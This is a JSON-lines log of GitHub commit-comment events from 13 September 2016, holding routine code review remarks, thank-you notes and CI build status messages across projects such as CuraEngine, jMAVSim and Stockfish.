{"id":"4555840409","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19002127,"position":19,"line":227,"path":"src/utils/linearAlg2D.h","commit_id":"09a3ec4790ebfcb0ac6b9e377c4a178745b9b04f","created_at":"2016-09-13T14:11:44Z","updated_at":"2016-09-13T14:11:44Z","body":"Implementation in header file."}},"created_at":"2016-09-13T14:11:44Z"}
{"id":"4555841828","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19002130,"position":5,"line":4,"path":"src/head_server/schedulers/RandomSchedulerType.js","commit_id":"7351d8c77763ae65ad0f73af2ac9f46302790aaa","created_at":"2016-09-13T14:11:57Z","updated_at":"2016-09-13T14:11:57Z","body":"Below\r\nrequire(\"./MatchObject\");"}},"created_at":"2016-09-13T14:11:57Z"}
{"id":"4555843374","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19002136,"position":null,"line":null,"path":null,"commit_id":"be31e49e40a74af22da228b8402a86b96e7b7da4","created_at":"2016-09-13T14:12:14Z","updated_at":"2016-09-13T14:12:14Z","body":"Seems strong so far... good luck my friend."}},"created_at":"2016-09-13T14:12:14Z"}
{"id":"4555844524","type":"CommitCommentEvent","actor":{"login":"kd0aij"},"repo":{"name":"PX4/jMAVSim"},"payload":{"comment":{"id":19002139,"position":null,"line":null,"path":null,"commit_id":"bf1490e35d9a47da09b56c7f78c4edd96a13a701","created_at":"2016-09-13T14:12:26Z","updated_at":"2016-09-13T14:12:26Z","body":"The Iris does not climb a minimum throttle with a mass of 0.8kg. So the author of this change is confused."}},"created_at":"2016-09-13T14:12:26Z"}
{"id":"4555850613","type":"CommitCommentEvent","actor":{"login":"nijel"},"repo":{"name":"phpmyadmin/sql-parser"},"payload":{"comment":{"id":19002148,"position":null,"line":null,"path":null,"commit_id":"ed6d4f41379de59a4a4670e506fc5b7f2721e1b0","created_at":"2016-09-13T14:13:21Z","updated_at":"2016-09-13T14:13:21Z","body":"Fortunately most of the information was already available on GitHub releases where @udan11 has put the info for past releases."}},"created_at":"2016-09-13T14:13:21Z"}
{"id":"4555851083","type":"CommitCommentEvent","actor":{"login":"LorenzMeier"},"repo":{"name":"PX4/jMAVSim"},"payload":{"comment":{"id":19002151,"position":null,"line":null,"path":null,"commit_id":"bf1490e35d9a47da09b56c7f78c4edd96a13a701","created_at":"2016-09-13T14:13:26Z","updated_at":"2016-09-13T14:13:26Z","body":"ok. So let's move back to 0\u0010.8 then."}},"created_at":"2016-09-13T14:13:26Z"}
{"id":"4555852195","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19002153,"position":37,"line":38,"path":"docs/source/tagset/elemento-related-article.rst","commit_id":"fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a","created_at":"2016-09-13T14:13:35Z","updated_at":"2016-09-13T14:13:35Z","body":"Rs fica confuso sim.. mas não acho que vale a pena investirmos tempo em revirar o histórico do repositório em busca desse tipo de coisa. Acho que é mais uma questão de termos mais cuidado na descrição dos tickets e mensagens dos commits para não perdermos o rastro das alterações.\n\n-Gustavo\n\nOn 13 de setembro de 2016 at 10:59:12, Letícia Aquino (notifications@github.com) wrote:\n> @gustavofonseca você acha que pode ficar confuso para quem utilizar a documentação?  \n>  \n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/scieloorg/scielo_publishing_schema/commit/fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a#commitcomment-19001920  \n\n"}},"created_at":"2016-09-13T14:13:35Z"}
{"id":"4555854331","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19002159,"position":null,"line":null,"path":null,"commit_id":"be31e49e40a74af22da228b8402a86b96e7b7da4","created_at":"2016-09-13T14:13:54Z","updated_at":"2016-09-13T14:13:54Z","body":"@VoyagerOne Thank you. BTW, did you see my comment on [your attempt](https://github.com/VoyagerOne/Stockfish/commit/ec7a64476cad7d457e62209d9c4fa626108d5d19)?"}},"created_at":"2016-09-13T14:13:54Z"}
{"id":"4555860846","type":"CommitCommentEvent","actor":{"login":"julianlam"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":19002175,"position":null,"line":null,"path":null,"commit_id":"c1e361377938149d0d10b55b618aa20f40cb4904","created_at":"2016-09-13T14:14:55Z","updated_at":"2016-09-13T14:14:55Z","body":"No impediments, can be done if you want to submit a PR for it 😄 "}},"created_at":"2016-09-13T14:14:55Z"}
{"id":"4555861579","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19002177,"position":null,"line":null,"path":null,"commit_id":"8825a211581a463e8c9312a204ee81e00163ecdf","created_at":"2016-09-13T14:15:03Z","updated_at":"2016-09-13T14:15:03Z","body":"TeamCity Todo :: Build [Build 92](http://109.103.226.38:8512/viewLog.html?buildId=38485&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-13T14:15:03Z"}
{"id":"4555863675","type":"CommitCommentEvent","actor":{"login":"leticiaquino"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19002182,"position":null,"line":null,"path":null,"commit_id":"fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a","created_at":"2016-09-13T14:15:23Z","updated_at":"2016-09-13T14:15:23Z","body":":crying_cat_face:   Okay"}},"created_at":"2016-09-13T14:15:23Z"}
{"id":"4555863899","type":"CommitCommentEvent","actor":{"login":"nakulbharuka"},"repo":{"name":"banoresaurabh/Drug-store-app"},"payload":{"comment":{"id":19002183,"position":246,"line":246,"path":"final/exp.Designer.cs","commit_id":"6ccbde698cb0072c2b38674d1860f96e2ea18c3c","created_at":"2016-09-13T14:15:25Z","updated_at":"2016-09-13T14:15:25Z","body":"send those pictures\n\nOn 13 September 2016 at 18:18, Saurabh Banore <notifications@github.com>\nwrote:\n\n> Close2 is the name of the image I attached in the picturebox....\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/banoresaurabh/Drug-store-app/commit/6ccbde698cb0072c2b38674d1860f96e2ea18c3c#commitcomment-19000837>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AUODKUX6F_Rf2v8f-w1u-9kZznXY-fQxks5qppuJgaJpZM4J7iSR>\n> .\n>\n\n\n\n-- \nRegards,\nNakul Bharuka\n"}},"created_at":"2016-09-13T14:15:25Z"}
{"id":"4555865393","type":"CommitCommentEvent","actor":{"login":"wangyouquan"},"repo":{"name":"wangyouquan/MT"},"payload":{"comment":{"id":19002186,"position":null,"line":null,"path":null,"commit_id":"b57c58ca7f29c106a36d271b8e406ba625617415","created_at":"2016-09-13T14:15:38Z","updated_at":"2016-09-13T14:15:38Z","body":"1"}},"created_at":"2016-09-13T14:15:38Z"}
{"id":"4555865581","type":"CommitCommentEvent","actor":{"login":"weverson17"},"repo":{"name":"weverson17/ProjetoHotel"},"payload":{"comment":{"id":19002187,"position":null,"line":null,"path":null,"commit_id":"908ced674d4851e84d1cda1af6c8b15a8e08fcc1","created_at":"2016-09-13T14:15:40Z","updated_at":"2016-09-13T14:15:40Z","body":"Bug Ao Sicronizar, postar outro"}},"created_at":"2016-09-13T14:15:40Z"}
{"id":"4555865967","type":"CommitCommentEvent","actor":{"login":"wangyouquan"},"repo":{"name":"wangyouquan/MT"},"payload":{"comment":{"id":19002188,"position":null,"line":null,"path":null,"commit_id":"b57c58ca7f29c106a36d271b8e406ba625617415","created_at":"2016-09-13T14:15:44Z","updated_at":"2016-09-13T14:15:44Z","body":"1"}},"created_at":"2016-09-13T14:15:44Z"}
{"id":"4555866386","type":"CommitCommentEvent","actor":{"login":"wangyouquan"},"repo":{"name":"wangyouquan/MT"},"payload":{"comment":{"id":19002189,"position":null,"line":null,"path":null,"commit_id":"b57c58ca7f29c106a36d271b8e406ba625617415","created_at":"2016-09-13T14:15:48Z","updated_at":"2016-09-13T14:15:48Z","body":"1"}},"created_at":"2016-09-13T14:15:48Z"}
{"id":"4555866622","type":"CommitCommentEvent","actor":{"login":"lgommans"},"repo":{"name":"lgommans/factorio-serverlist"},"payload":{"comment":{"id":19002190,"position":null,"line":null,"path":null,"commit_id":"29620133af2d15271418f39b5a921ef8f005bce6","created_at":"2016-09-13T14:15:50Z","updated_at":"2016-09-13T14:15:50Z","body":"Closes #4 "}},"created_at":"2016-09-13T14:15:50Z"}
{"id":"4555869797","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19002198,"position":null,"line":null,"path":null,"commit_id":"8825a211581a463e8c9312a204ee81e00163ecdf","created_at":"2016-09-13T14:16:20Z","updated_at":"2016-09-13T14:16:20Z","body":"TeamCity Todo :: Build [Build 92](http://109.103.226.38:8512/viewLog.html?buildId=38485&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 8 Build time: 00:01:15"}},"created_at":"2016-09-13T14:16:20Z"}
{"id":"4555871695","type":"CommitCommentEvent","actor":{"login":"wangyouquan"},"repo":{"name":"wangyouquan/MT"},"payload":{"comment":{"id":19002205,"position":null,"line":null,"path":null,"commit_id":"b57c58ca7f29c106a36d271b8e406ba625617415","created_at":"2016-09-13T14:16:36Z","updated_at":"2016-09-13T14:16:36Z","body":"没事"}},"created_at":"2016-09-13T14:16:36Z"}
{"id":"4555873270","type":"CommitCommentEvent","actor":{"login":"frank-gro"},"repo":{"name":"frank-gro/android"},"payload":{"comment":{"id":19002209,"position":null,"line":null,"path":null,"commit_id":"82327cbe7be92ccf98869a2b80d1bc466cf64f5e","created_at":"2016-09-13T14:16:50Z","updated_at":"2016-09-13T14:16:50Z","body":"Merge branch 'cm-13.0' of github.com:CyanogenMod/android_build into cm-13.0"}},"created_at":"2016-09-13T14:16:50Z"}
{"id":"4555875383","type":"CommitCommentEvent","actor":{"login":"Jeremy-Barnes"},"repo":{"name":"Jeremy-Barnes/Critters"},"payload":{"comment":{"id":19002215,"position":null,"line":null,"path":null,"commit_id":"4b9de43fa3a9fc1d1846518ab17f87d1ef34d96f","created_at":"2016-09-13T14:17:11Z","updated_at":"2016-09-13T14:17:11Z","body":"Oh wow, that is a weird thing.\r\nNot sure if GWT knows how to JSify that. Thats an `exists` method, do you not do the same thing in breakout (which compiles fine)?\r\n\r\nDoes the JS launch work on your machine?"}},"created_at":"2016-09-13T14:17:11Z"}
{"id":"4555875794","type":"CommitCommentEvent","actor":{"login":"martin-gorner"},"repo":{"name":"martin-gorner/tensorflow-mnist-tutorial"},"payload":{"comment":{"id":19002217,"position":null,"line":null,"path":null,"commit_id":"5d0a9b1a8468b3ae18d38e183187df435be56871","created_at":"2016-09-13T14:17:15Z","updated_at":"2016-09-13T14:17:15Z","body":"zamasu, no the big change was adding batch normalisation which bumped accuracy from 99.2-99.3 to 99.4-99.5 The variations come from the system converging towards slightly different local minima on different runs. There are runs however where I getting a solid 99.5%. Video here: https://youtu.be/eW-2p_SNQz4"}},"created_at":"2016-09-13T14:17:15Z"}
{"id":"4555876983","type":"CommitCommentEvent","actor":{"login":"ChriZathens"},"repo":{"name":"ccrisan/motioneye"},"payload":{"comment":{"id":19002220,"position":null,"line":null,"path":null,"commit_id":"8bfa621874a5078928687d89f3d517aeecfea7f0","created_at":"2016-09-13T14:17:26Z","updated_at":"2016-09-13T14:17:26Z","body":"Hi, Calin!\r\nJust wanted to confirm that after your latest commits there is now an option on setting to save as .mp4/.mkv\r\nI also changed to .mp4 and the files are created as they should.\r\nThanks a lot!"}},"created_at":"2016-09-13T14:17:26Z"}
{"id":"4555877890","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19002223,"position":null,"line":null,"path":null,"commit_id":"8fe157533ff768616c71cc6b0a5cec6044a84f32","created_at":"2016-09-13T14:17:34Z","updated_at":"2016-09-13T14:17:34Z","body":"You have applied links in technical and design team members (not to be confused with cartoonists) names also. Remove that, because, in their profile no posts or their work is displayed. To knwo which design team member is not cartoonist, open his profile and see if any cartoon is there or not."}},"created_at":"2016-09-13T14:17:34Z"}
{"id":"4555880607","type":"CommitCommentEvent","actor":{"login":"rharut"},"repo":{"name":"rharut/r42s"},"payload":{"comment":{"id":19002232,"position":null,"line":null,"path":null,"commit_id":"509af1316279dbb0b412eeac79684f728a6880e1","created_at":"2016-09-13T14:17:57Z","updated_at":"2016-09-13T14:17:57Z","body":"```sh\r\ngco remastering\r\ngm -s ours master\r\ngcm\r\ngm remastering\r\n```"}},"created_at":"2016-09-13T14:17:57Z"}
{"id":"4555882088","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19002236,"position":null,"line":null,"path":null,"commit_id":"5828aefbddb25f10082b8735a4ce3aafc9053704","created_at":"2016-09-13T14:18:13Z","updated_at":"2016-09-13T14:18:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 988](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13183&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 6 (6 new), passed: 208, ignored: 3 Build time: 00:08:29\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET /group_info request fails on non-existent device: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET group_info after POST should return what was posted.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET group_info after PUT should return what was updated.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.PUT group_info if not previously created should create it.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.DELETE group_info should delete group.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-13T14:18:13Z"}
{"id":"4555883951","type":"CommitCommentEvent","actor":{"login":"ccrisan"},"repo":{"name":"ccrisan/motioneye"},"payload":{"comment":{"id":19002238,"position":null,"line":null,"path":null,"commit_id":"8bfa621874a5078928687d89f3d517aeecfea7f0","created_at":"2016-09-13T14:18:28Z","updated_at":"2016-09-13T14:18:28Z","body":"Thanks for letting me know and thanks for keeping an eye on my commits :)"}},"created_at":"2016-09-13T14:18:28Z"}
{"id":"4555886311","type":"CommitCommentEvent","actor":{"login":"kd0aij"},"repo":{"name":"PX4/jMAVSim"},"payload":{"comment":{"id":19002243,"position":null,"line":null,"path":null,"commit_id":"bf1490e35d9a47da09b56c7f78c4edd96a13a701","created_at":"2016-09-13T14:18:49Z","updated_at":"2016-09-13T14:18:49Z","body":"I assume the default quadcopter parameters were chosen to achieve a hover at 50% throttle, since that is an implicit assumption in the PX4 multicopter code (prior to my addition of the hover throttle parameter, center stick mapped both to 50% thrust and zero vertical speed). Also, best practice for helicopter setups requires configuring for hover at center stick."}},"created_at":"2016-09-13T14:18:49Z"}
{"id":"4555889966","type":"CommitCommentEvent","actor":{"login":"marcoconti83"},"repo":{"name":"wireapp/wire-ios-data-model"},"payload":{"comment":{"id":19002252,"position":null,"line":null,"path":null,"commit_id":"f2c99dc786c2e3a679f20ab0a8db0c26d7995cad","created_at":"2016-09-13T14:19:25Z","updated_at":"2016-09-13T14:19:25Z","body":"# Reason for this pull request\r\nThe `reactions` key on `ZMMessage` was not marked as ignored, causing sync engine to try to upload it\r\n\r\n# Changes\r\nIgnore the `reactions` key (it was ignored only in `ZMSystemMessage`, it should have been ignored in the `ZMMessage` superclass instead)\r\n\r\n# Known issues\r\nRemoving a key from the list of keys to synchronize (in this case, adding it to the ignore list) will cause the bitfield holding the list of keys that need to be synchronized upstream to go out of sync, potentially causing one other random key to be marked as needing to upload instead. This is undesired and might cause erratic behaviour for that one message, but it is better than the crash loop that we have if we without this PR."}},"created_at":"2016-09-13T14:19:25Z"}
{"id":"4555891784","type":"CommitCommentEvent","actor":{"login":"nmunro4"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19002255,"position":null,"line":null,"path":null,"commit_id":"f8355e9ee516bb338ff14f7ee6c438da6f61ad53","created_at":"2016-09-13T14:19:41Z","updated_at":"2016-09-13T14:19:41Z","body":"So if I'm running 30 workers with `-ns` and 1 server with `-os`, I should disable the db cleaner on all the workers? This should then fix the occasional deadlocks on the db?"}},"created_at":"2016-09-13T14:19:41Z"}
{"id":"4555892867","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19002259,"position":null,"line":null,"path":null,"commit_id":"be31e49e40a74af22da228b8402a86b96e7b7da4","created_at":"2016-09-13T14:19:51Z","updated_at":"2016-09-13T14:19:51Z","body":"Yes, I was aware of that.  I believe it wouldn't impact too much since it's at such a higher depth."}},"created_at":"2016-09-13T14:19:51Z"}
{"id":"4555894388","type":"CommitCommentEvent","actor":{"login":"davidromani"},"repo":{"name":"sonata-project/SonataAdminBundle"},"payload":{"comment":{"id":19002262,"position":null,"line":null,"path":null,"commit_id":"240ecbd02d453f9acaf81e00112ff5d8dae4459b","created_at":"2016-09-13T14:20:06Z","updated_at":"2016-09-13T14:20:06Z","body":"Thank you very much!"}},"created_at":"2016-09-13T14:20:06Z"}
{"id":"4555895564","type":"CommitCommentEvent","actor":{"login":"kd0aij"},"repo":{"name":"PX4/jMAVSim"},"payload":{"comment":{"id":19002267,"position":null,"line":null,"path":null,"commit_id":"bf1490e35d9a47da09b56c7f78c4edd96a13a701","created_at":"2016-09-13T14:20:21Z","updated_at":"2016-09-13T14:20:21Z","body":"Are the pre-arm throttle safety checks disabled in SITL?"}},"created_at":"2016-09-13T14:20:21Z"}
{"id":"4555896152","type":"CommitCommentEvent","actor":{"login":"vperron"},"repo":{"name":"Polyconseil/systematic"},"payload":{"comment":{"id":19002268,"position":4,"line":160,"path":"mk/main.mk","commit_id":"37bb318d7715f4ee79e78fb91e6d9352a747a533","created_at":"2016-09-13T14:20:26Z","updated_at":"2016-09-13T14:20:26Z","body":"All the time when you put an error in, say, the index.js of your app.\n\nSource: do not apply this commit. Clone a systematic-enabled project.\nDownload the modules. Put an error in the main file. Look at the stack\ntrace. :)\n\nDebugging was: try any other kind of debugging tool. The only one which did\nnot fail to display the line and file name was \"source-map\". Did not find\nout why, though.\n\nOn Sep 12, 2016 21:48, \"Raphaël Boucher\" <notifications@github.com> wrote:\n\n> Why and when is that buggy?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Polyconseil/systematic/commit/37bb318d7715f4ee79e78fb91e6d9352a747a533#commitcomment-18984177>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAFaKkhJTKTy8JQEkq7A9yTYmolNqvRBks5qpUosgaJpZM4J6i-C>\n> .\n>\n"}},"created_at":"2016-09-13T14:20:26Z"}
{"id":"4555896550","type":"CommitCommentEvent","actor":{"login":"ZigaByte"},"repo":{"name":"Jeremy-Barnes/Critters"},"payload":{"comment":{"id":19002269,"position":null,"line":null,"path":null,"commit_id":"4b9de43fa3a9fc1d1846518ab17f87d1ef34d96f","created_at":"2016-09-13T14:20:29Z","updated_at":"2016-09-13T14:20:29Z","body":"I have not tried it. This method is a bit different. \r\n\r\nThe other checks if there is an object of this class. This one checks if there is an object of a certain class or any of it's subclasses."}},"created_at":"2016-09-13T14:20:29Z"}
{"id":"4555896758","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19002270,"position":19,"line":227,"path":"src/utils/linearAlg2D.h","commit_id":"09a3ec4790ebfcb0ac6b9e377c4a178745b9b04f","created_at":"2016-09-13T14:20:31Z","updated_at":"2016-09-13T14:20:31Z","body":"This replaces `pointLiesOnTheRightOfLine`, or should just `return -pointLiesOnTheRightOfLine(p, a, b)`"}},"created_at":"2016-09-13T14:20:31Z"}
{"id":"4555900065","type":"CommitCommentEvent","actor":{"login":"rollandf"},"repo":{"name":"oVirt/ovirt-site"},"payload":{"comment":{"id":19002275,"position":null,"line":null,"path":null,"commit_id":"e2f834ab45c89e0139cc3d3896de94812c295907","created_at":"2016-09-13T14:20:59Z","updated_at":"2016-09-13T14:20:59Z","body":":+1: "}},"created_at":"2016-09-13T14:20:59Z"}
{"id":"4555901322","type":"CommitCommentEvent","actor":{"login":"mathiasschopmans"},"repo":{"name":"AOEpeople/YAD"},"payload":{"comment":{"id":19002278,"position":null,"line":null,"path":null,"commit_id":"90484af478a905d3046a641d1455700fc7e0be92","created_at":"2016-09-13T14:21:11Z","updated_at":"2016-09-13T14:21:11Z","body":"Maybe this should be `trap cleanup SIGINT SIGTERM EXIT`"}},"created_at":"2016-09-13T14:21:11Z"}
{"id":"4555901497","type":"CommitCommentEvent","actor":{"login":"EarthlingKira"},"repo":{"name":"AOEpeople/YAD"},"payload":{"comment":{"id":19002280,"position":5,"line":60,"path":"php.sh","commit_id":"90484af478a905d3046a641d1455700fc7e0be92","created_at":"2016-09-13T14:21:13Z","updated_at":"2016-09-13T14:21:13Z","body":"Maybe we should add all common signals?\r\n\r\n    SIGHUP - hangup or exit a foreground running process from a terminal\r\n    SIGINT - Ctrl-C from the keyboard\r\n    SIGQUIT - Ctrl-\\ from the keyboard\r\n    SIGTERM - software termination signal"}},"created_at":"2016-09-13T14:21:13Z"}
{"id":"4555901973","type":"CommitCommentEvent","actor":{"login":"johnsoza"},"repo":{"name":"C3LX/policies"},"payload":{"comment":{"id":19002282,"position":null,"line":null,"path":null,"commit_id":"eba8ec3e224889783ee7c4b0541fb2d011482f0e","created_at":"2016-09-13T14:21:17Z","updated_at":"2016-09-13T14:21:17Z","body":"Typo to share with Catalyze.\r\nPolicy #9 changed \"not\" to \"no\""}},"created_at":"2016-09-13T14:21:17Z"}
{"id":"4555902199","type":"CommitCommentEvent","actor":{"login":"ptgamr"},"repo":{"name":"ptgamr/ember-kinto"},"payload":{"comment":{"id":19002283,"position":null,"line":null,"path":null,"commit_id":"ae05114148d5bba1608f84809256fda7bc65fa67","created_at":"2016-09-13T14:21:19Z","updated_at":"2016-09-13T14:21:19Z","body":"https://github.com/Kinto/kinto.js/issues/542"}},"created_at":"2016-09-13T14:21:19Z"}
{"id":"4555905120","type":"CommitCommentEvent","actor":{"login":"AlexIIL"},"repo":{"name":"BuildCraft/BuildCraftAPI"},"payload":{"comment":{"id":19002289,"position":15,"line":15,"path":"api/buildcraft/api/mj/types/LaserType.java","commit_id":"e0cd96e1daf0d2d4319958716eaf7bc7f45f317d","created_at":"2016-09-13T14:21:45Z","updated_at":"2016-09-13T14:21:45Z","body":"Did I explain in irc enough or is there still a problem?\r\n\r\n(I don't like leaving a question somewhere :P)"}},"created_at":"2016-09-13T14:21:45Z"}
{"id":"4555906680","type":"CommitCommentEvent","actor":{"login":"JorgeUlises"},"repo":{"name":"GLUD/TimeLapseScript"},"payload":{"comment":{"id":19002292,"position":null,"line":null,"path":null,"commit_id":"ab342342c4b4bfd436d5c60a4525df0538d87121","created_at":"2016-09-13T14:22:00Z","updated_at":"2016-09-13T14:22:00Z","body":"@kellar1812 yo le cambiaria el nombre al script por cron, no crontab."}},"created_at":"2016-09-13T14:22:00Z"}
{"id":"4555907233","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19002293,"position":19,"line":227,"path":"src/utils/linearAlg2D.h","commit_id":"09a3ec4790ebfcb0ac6b9e377c4a178745b9b04f","created_at":"2016-09-13T14:22:05Z","updated_at":"2016-09-13T14:22:05Z","body":"This computation is also known as the perpdot, and might be added to the `Point` class instead."}},"created_at":"2016-09-13T14:22:05Z"}
{"id":"4555909347","type":"CommitCommentEvent","actor":{"login":"typfel"},"repo":{"name":"wireapp/wire-ios-data-model"},"payload":{"comment":{"id":19002295,"position":null,"line":null,"path":null,"commit_id":"f2c99dc786c2e3a679f20ab0a8db0c26d7995cad","created_at":"2016-09-13T14:22:26Z","updated_at":"2016-09-13T14:22:26Z","body":"*reviewed* by Jacob"}},"created_at":"2016-09-13T14:22:26Z"}
{"id":"4555911393","type":"CommitCommentEvent","actor":{"login":"Fastjur"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":19002300,"position":null,"line":null,"path":null,"commit_id":"71b274e6d2f2e5e16ed5bb2d04455b62afdc8c3a","created_at":"2016-09-13T14:22:43Z","updated_at":"2016-09-13T14:22:43Z","body":"I'm curious. How did it work before this commit? Did you run `mvn test` before pushing the previous commit? This should not even compile."}},"created_at":"2016-09-13T14:22:43Z"}
{"id":"4555916743","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19002311,"position":null,"line":null,"path":null,"commit_id":"acad8caa0d7c2f7e4342d681e01ed9840e4fc59a","created_at":"2016-09-13T14:23:32Z","updated_at":"2016-09-13T14:23:32Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35265/testReport/) for this commit**"}},"created_at":"2016-09-13T14:23:32Z"}
{"id":"4555919312","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19002316,"position":null,"line":null,"path":null,"commit_id":"8fe157533ff768616c71cc6b0a5cec6044a84f32","created_at":"2016-09-13T14:23:55Z","updated_at":"2016-09-13T14:23:55Z","body":"For the links of previous year team members, you can replace the base URL of Monday Morning i.e. 'http://mondaymorning.nitrkl.ac.in/' with `<?php echo SITE_ROOT; ?>`"}},"created_at":"2016-09-13T14:23:55Z"}
{"id":"4555920187","type":"CommitCommentEvent","actor":{"login":"abisz"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":19002318,"position":14,"line":28,"path":"public/app/modules/mobidul/station/creator/directives/EditorDirective.js","commit_id":"f785aa619aab82433a73cf66b04f660b3d603d81","created_at":"2016-09-13T14:24:04Z","updated_at":"2016-09-13T14:24:04Z","body":"That's only the case if there is just one state so we don't need this parameter. Or am I missing something?"}},"created_at":"2016-09-13T14:24:04Z"}
{"id":"4555926589","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19002332,"position":18,"line":284,"path":"tests/utils/LinearAlg2DTest.cpp","commit_id":"09a3ec4790ebfcb0ac6b9e377c4a178745b9b04f","created_at":"2016-09-13T14:25:04Z","updated_at":"2016-09-13T14:25:04Z","body":"A proper test suite should also test a case where the answer is not `1`. Preferably one where the answer is negative and one where the answer is 0."}},"created_at":"2016-09-13T14:25:04Z"}
{"id":"4555927190","type":"CommitCommentEvent","actor":{"login":"andmorefine"},"repo":{"name":"AkiraMurata/pitatto"},"payload":{"comment":{"id":19002335,"position":null,"line":null,"path":null,"commit_id":"150800361e98888411d28e3ed37dcead609120e4","created_at":"2016-09-13T14:25:11Z","updated_at":"2016-09-13T14:25:11Z","body":"PUSH できましたー"}},"created_at":"2016-09-13T14:25:11Z"}
{"id":"4555928879","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19002336,"position":52,"line":51,"path":"Unit One/src/com/bayviewglen/daytwo/Sudoko.java","commit_id":"5dfedc9ad477626b6c84858accc16c131bd49f99","created_at":"2016-09-13T14:25:26Z","updated_at":"2016-09-13T14:25:26Z","body":"great comment"}},"created_at":"2016-09-13T14:25:26Z"}
{"id":"4555929664","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19002338,"position":82,"line":81,"path":"Unit One/src/com/bayviewglen/daytwo/Sudoko.java","commit_id":"5dfedc9ad477626b6c84858accc16c131bd49f99","created_at":"2016-09-13T14:25:34Z","updated_at":"2016-09-13T14:25:34Z","body":"wow really now"}},"created_at":"2016-09-13T14:25:34Z"}
{"id":"4555930948","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19002339,"position":3,"line":3,"path":"Unit One/src/com/bayviewglen/daytwo/Sudoko.java","commit_id":"5dfedc9ad477626b6c84858accc16c131bd49f99","created_at":"2016-09-13T14:25:45Z","updated_at":"2016-09-13T14:25:45Z","body":"import java.util.*;"}},"created_at":"2016-09-13T14:25:45Z"}
{"id":"4555931797","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19002342,"position":1,"line":1,"path":"Unit One/src/com/bayviewglen/daytwo/Sudoko.java","commit_id":"5dfedc9ad477626b6c84858accc16c131bd49f99","created_at":"2016-09-13T14:25:53Z","updated_at":"2016-09-13T14:25:53Z","body":"nice package name"}},"created_at":"2016-09-13T14:25:53Z"}
